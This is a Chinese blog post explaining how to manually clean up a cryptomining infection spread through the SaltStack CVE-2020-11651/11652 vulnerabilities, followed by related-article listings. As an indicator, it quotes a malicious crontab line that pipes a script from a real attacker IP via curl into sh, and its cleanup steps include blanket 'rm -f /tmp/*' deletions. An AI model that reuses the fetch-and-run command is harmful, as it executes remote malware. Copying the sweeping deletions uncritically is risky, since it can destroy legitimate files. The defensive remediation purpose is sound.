手工清除Saltstack漏洞导致的挖矿病毒

最新推荐文章于 2023-02-16 09:33:19 发布
最新推荐文章于 2023-02-16 09:33:19 发布
阅读量1.2k 收藏
点赞数
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wisheen/article/details/106027852
版权

Saltstack是基于python开发的一套C/S自动化运维工具。近日,SaltStack被爆存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652),其中:

CVE-2020-11651:为认证绕过漏洞,攻击者可构造恶意请求,绕过Salt Master的验证逻辑,调用相关未授权函数功能,达到远程命令执行目的。

CVE-2020-11652:为目录遍历漏洞,攻击者可构造恶意请求,读取服务器上任意文件,获取系统敏感信息信息。

 

漏洞影响版本

SaltStack < 2019.2.4

SaltStack < 3000.2

手工清理过程:

1. ssh到自己的主机,top指令查看,如果有salt-minions之类的进程占满cpu,说明中招了,先卸载一下salt-minion
centos/redhat:    yum remove salt-minion
ubuntu: apt remove salt-minion


2. 查看定时任务
crontab -l
如果看到类似这样
* * * * * curl http://217.8.117.137/c.sh | sh > /dev/null 2>&1
* * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
用 crontab -e 指令编辑定时任务
进入编辑器后,把上面两行删除然后保存退出,删除(按两下d删除光标行)和退出(按冒号,光标在最下面,输入wq回车)可参考vim的基本用法


3. 把上面的文件删除
rm -f /usr/bin/salt-store
rm -f /tmp/salt-store
rm -f /var/tmp/salt-store
rm -f /tmp/*
rm -f /var/tmp/*


4. 杀干坏事的进程
ps aux |grep salt-store
如果有值,则用
kill xxx
杀掉,xxx就是进程id(第二列的那个数字)
同样的道理,用
ps aux |grep salt-minions
查看,并用kill杀


5. top 观察一下,是否还有salt-minions,如果没有就正常了

wisheen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手工清除灰鸽子蠕虫病毒方法
11-10
主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。注意:为防止误操作,清除前一定要做好备份
手工清除Windows服务器上的Steam挖矿病毒:HackTool/CoinMiner.a及Trojan/Miner.ac
热门推荐
chetiao3271的博客
05-03 1万+
手工清除Windows服务器上的Steam挖矿病毒:HackTool/CoinMiner.a及Trojan/Miner.ac 起因: 最近服务器群里的两台Windows虚拟服务器上的CPU占用率超级高(已经达到了91%),严重影响公司程序的正常运行,但是又不能安装杀毒软件(...
如何清除Hacktool.Rootkit病毒,如何让msdirectx.sys此文件彻底删除,谢谢!
yangli1103的专栏
02-15 3217
我所用的杀毒软件为Norton   AntiVirus,前天上网后中了此病毒,诺就一直弹出此杀毒信息,并且每隔30秒左右会出现一次,在安全模式下反复杀还是无济于事,msdirectx.sys这个文件始终无法删除,删除后又马上出现,实在没辙了,请教各位大师高手,请教高招!先谢了! 问题点数:50、回复次数:8 Rootkit主要分为两种1.更改系统数据结构   2.更改系统执行路径在
ubuntu清理挖矿病毒
My Struggle
02-16 1387
清理挖矿程序的基本步骤 先用top命令查看cpu占用率大的进程的PID,再用systemctl status cpu占用率大的进程的PID命令查看守护进程地址,以用rm命令删除挖矿程序。在用rm命令删除挖矿程序前,应该检查是否存在后门,以防止坏东西通过后门再次侵入。 所谓后门,我检查了路由条目和定时任务: 是否有多出来的定时任务(非自己加入的定时任务)? 是否有多出来的路由条目? 是否是应为集群中其他的服务器被感染,该服务器是被传染的?
[UBUNTU]挖矿病毒处理
俗科技的博客
02-03 2913
1.使用top和htop指令查看,占用cpu比较高的进程 /tmp/.weblogic/javae 1.杀掉病毒进程 kill -9 病毒进程的PID 2.删除病毒文件 rm -fr /tmp/.weblogic 3.删除tomcat下病毒远程下载程序 停止tomcat进程服务: kill -9 `pgrep java` tomcat目录/webapps/目录下只留下“项目本身的war包文件”,其他可疑的TAR包文件(病毒)和多余的文件(如docs,manager,host...
挖矿病毒之CoinMiner入侵SQLServer
黑白的博客
06-26 4818
挖矿病毒之CoinMiner入侵SQLServer
手工轻松清除隐藏在电脑里的病毒和木马
05-12
现在上网的朋友越来越多了,其中有一点不可避免的就是如何防范和查杀病毒和恶意攻击程序了。但是,如果不小心中了病毒而身边又没有杀毒软件...没有关系,今天我就来教大家怎样轻松地手工清除藏在电脑里的病毒和木马。
MSN相片病毒手工清除方法
03-03
2007年6月1日,MSN相片病毒疯狂传播。本文详细介绍了病毒情况和手工清除方法。
手工清除隐藏的病毒文件五招.doc
09-16
电脑安全杀毒专用,病毒攻防
手工删除计算机病毒的原理及步骤
01-15
我们因掌握删除计算机病毒的方法,以减少我们的损失,通过对威金病毒、恶邮差病毒、MSN圣诞照片变种B(Backdoor.Win32.PBot.b)的手工删除来学习掌握手工删除计算机病毒的方法。并了解病毒的本质、构成以及运行原理...
【Android 逆向】Android 逆向通用工具开发 ( PC 端工具 hacktool 启动 main 函数分析 | hacktool 工程中的核心类 HackCommand 分析 )
让 学习 成为一种 习惯 ( 韩曙亮 の 技术博客 )
11-07 1516
一、PC 端工具 hacktool 启动 main 函数分析、 二、PC 端工具 hacktool 工程中的核心类 HackCommand 分析
salt攻击解决办法
yuer629
10-24 353
1) 仅仅kill 掉 salt-minion是无法达到根治的目的的, 因为还有一个根进程,在定期检测,如果salt-minion 被清理了, 它会再次下载。#rm -rf /tmp/.ICEd-unix/* (如果不清理, 它还是会定期运行,病毒依然存在)5-1.如果还是失败, 那么很遗憾,表示你的病毒根源来自于局域网,那么局域网的防火墙也得配起来。5. 检验战果,top命令,观看10分钟,再无发现salt-minion,表示成功。6. 重启salt-master, salt-minion。
SaltStack简介及其故障排除示例
博游天下,铭记于心——Jaafar之家
06-05 2123
Saltstack是一个具备puppet与func功能为一身的集中化,轻量级的自动化运维管理工具,使用python编写,功能非常强大,可以使用EPEL快速安装。相比较puppet,安装和配置更加容易和简单。 (官方文档:http://docs.saltstack.com/topics/installation/rhel.html)
【服务器管理】Ubuntu的一次惊心动魄的查杀挖矿病毒的经历:病毒伪装成python
陈艺荣
01-15 8820
本文讲解了笔者在2022年1月份进行挖矿病毒杀毒的完整过程!
遭遇“挖矿病毒——TagMiner以及杀毒的尝试
qq_42418728的博客
07-27 1322
后续可能被黑客再次关顾。这里可以看到,这个文件通过doos.pid文件生成随机的pid,然后一旦发现进程被杀死,就使用生成的pid启动新进程,这样就导致永远都无法靠kill-9命令杀死进程。由于需要校外访问处于内网中的服务器,于是服务器上面使用了内网穿透的软件,在开启内网穿透的两周后,服务器的显卡被匿名为“Python”程序的所高频占用。这里可以发现,此文件会启动后台数据库,收集挖矿数据,又发现病毒文件中包含一个叫nano.backup的文件,应该是用到了nano微型服务器进行挖矿数据传输。........
salt-minion自动修复代码,配合salt-minion监控使用
weixin_34406061的博客
11-11 237
上篇文章发了salt-minion的监控代码 http://6252961.blog.51cto.com/6242961/1710977 ,在监控跑完列出所有的有问题的客户端列表之后,如果手动一个个去修复,很费事,服务器你太多,所以写了这个自动修复的代码,解放双手代码逻辑:1、首先从数据库读取minion端有问题的服务器,如果数量超过100,则停止自...
Ubuntu清除挖矿病毒的一次记录
OTZ_2333的博客
02-24 3709
第一次遇到服务器被别人入侵挖矿,在专业人员的帮助下找到并清除挖矿病毒。这篇博客只是我的一个记录,不一定适用所有的情况,不过还是希望能给大家一定帮助。 发现问题:有程序使用了大量的GPU资源,询问了账号的主人发现并不是ta的程序,而且使用root身份kill后会自动重启。 此外,通过ps -aux命令显示,该程序的命令为一个文件夹,用过conda的人都知道/bin下面的python是一个可执行文件,而非文件夹;跟别说里面有一个pytorch文件夹 并且文件夹anaconda3根本不存在,该服务器装的
Ubuntu16.04.06 LTS -bash 进程占用cpu很高,中了挖矿病毒
玩人工智能的辣条哥的博客
06-21 5198
Ubuntu16.04.06 LTS -bash 进程占用cpu很高,别的程序开启过后就被killed,占用50%的CPU 1.netstat -antlp|grep -e -bash -e rsync 查看进程通信信息 与外国157.245.164.26地址通信 htop 2.root@ps-SYS-4028GR-TR:/# crontab -l 查看计划任务 /dev/shm/.bash/bash 删除crontab任务:crontab -r 3.ls -l /pr
墨者-sql手工注入漏洞测试
最新发布
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值